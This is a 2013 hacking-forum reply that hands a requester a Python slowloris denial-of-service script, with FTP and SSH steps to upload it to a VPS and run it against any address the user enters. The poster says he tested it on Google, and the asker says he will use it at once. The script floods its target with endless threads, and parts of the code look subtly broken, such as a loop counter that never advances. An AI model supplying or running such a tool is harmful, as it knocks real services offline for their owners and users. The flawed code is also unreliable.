RE: DoS Attack with VPS 12-09-2013, 05:55 PM
#10
(12-09-2013, 04:59 PM)3SidedSquare Wrote: DoS script != DoS method
To do what you're asking, save the following into a file, with the extension -.py, it can be named anything you like
(I made it just for you <3)Code:import socket import time from threading import Thread ##3SidedSquare## def byteize(string): return bytes(string,'UTF-8') def slowloris(address, timeout=0.3): head = "GET / HTTP/1.1" body = "\r\nHost: "+address+"\r\nConnection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36\r\nAccept-Encoding: gzip,deflate,sdch\r\nAccept-Language: en-US,en;q=0.8\r\n\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_RAW) s.connect((address,80)) i = 0 while(True): s.send(byteize(head[i:i+1])) time.sleep(0.1) if(i>len(head)-1): break i=0 while(True): s.send(byteize(body[1:i+1])) time.sleep(timeout) if(i>len(body)-1): break print("Enter address to DoS") address = input() while(True): thre = Thread(target=slowloris, args=(address,)) thre.start()
Transfer it to your vps, you can use ftp in your command line (assuming your vps supports ftp)
In windows command line:
Then to run it, log in via ssh and go to the directory you saved it in andCode:ftp open the.vps.server send local/file/path remote/file/path disconnect close
p.s. It's a slowloris attack that runs as many threads as possible. It'll get you banned straight away. (I got up to 1,342 threads while testing on Google before my computer locked up)Code:Python3.3 filename.py
Thanks! I'm going to try this now. See how long I can go
















![[+]](https://sinister.li/images/modern/collapse_collapsed.png)